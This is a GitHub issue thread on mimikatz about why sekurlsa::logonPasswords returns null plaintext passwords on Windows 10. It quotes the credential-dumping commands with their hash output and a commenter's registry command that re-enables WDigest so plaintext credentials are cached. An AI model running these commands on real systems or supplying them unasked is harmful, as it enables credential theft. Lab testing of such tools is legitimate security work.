### ISSUE TITLE
sekurlsa::logonPasswords does not show password

### ISSUE THREAD

**Issue by ilovefood2** [gentilkiwi/mimikatz#204]
I was trying to test program following instructions from wiki and for basic passwords retrieval the program does not show anything, even though my password is simple as one letter. 

environment : win10 x64 1803
                        no antivirus
                        disabled windows defender
 powershell was run under administrator privilege
`
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonPasswords 

Authentication Id : 0 ; 6518309 (00000000:00637625)
Session           : RemoteInteractive from 3
User Name         : testuser
Domain            : COMPUTER
Logon Server      : COMPUTER
Logon Time        : 4/22/2019 3:01:54 AM
SID               : S-1-5-21-1089944888-3404997787-2047992866-1002
        msv :
         [00000003] Primary
         * Username : testuser
         * Domain   : COMPUTER
         * NTLM     : c777f2dd81cff5aab5e27eadf2db6eb0
         * SHA1     : f17a98e79ca54d3a14ca73f29814db5b9925b1d1
        tspkg :
        wdigest :
         * Username : testuser
         * Domain   : COMPUTER
         *** Password : (null)**
        kerberos :
         * Username : testuser
         * Domain   : COMPUTER
         *** Password : (null)**
        ssp :
        credman :`

no matter how I tried, passwords always showed **### _null_** 

any idea why?

**Comment by super0xbad1dea** [comment]
WDigest should be disabled by default in Win10 1803, this could be the reason.

**Comment by ikelca** [comment]
then what can we do in this case?

**Comment by Jason4774** [comment]
> WDigest should be disabled by default in Win10 1803, this could be the reason.

this is not the reason?i cannot make it works.

**Comment by super0xbad1dea** [comment]
Dudes, if you wanna play with this, just search it how to enable WDigest. Be curious. 

Look here: http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/

Enable WDigest (Plz only in your Lab)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

**Comment by ikelca** [comment]
I don't think this is the cause since I tried on another win10 machine and passwords showed up. 
the only thing different with those two machines is that one is non-domain, the other is.
so I guess this tool doesn't work on non-domain user accounts?

**Comment by Jason4774** [comment]
> Dudes，如果你想玩这个，只需搜索它如何启用WDigest。保持好奇心。
> 
> 请看这里：[http](http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/)：[//[woshub.com/how-to-get-plain-text-passwords-of-windows-users/](http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/)](http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/)
> 
> 启用WDigest（仅在实验室中使用Plz）
> reg add HKLM \ SYSTEM \ CurrentControlSet \ Control \ SecurityProviders \ WDigest / v UseLogonCredential / t REG_DWORD / d 1

I Have tried it but it not works.

**Comment by gentilkiwi** [comment]
https://github.com/gentilkiwi/mimikatz/issues/40#issuecomment-220830921
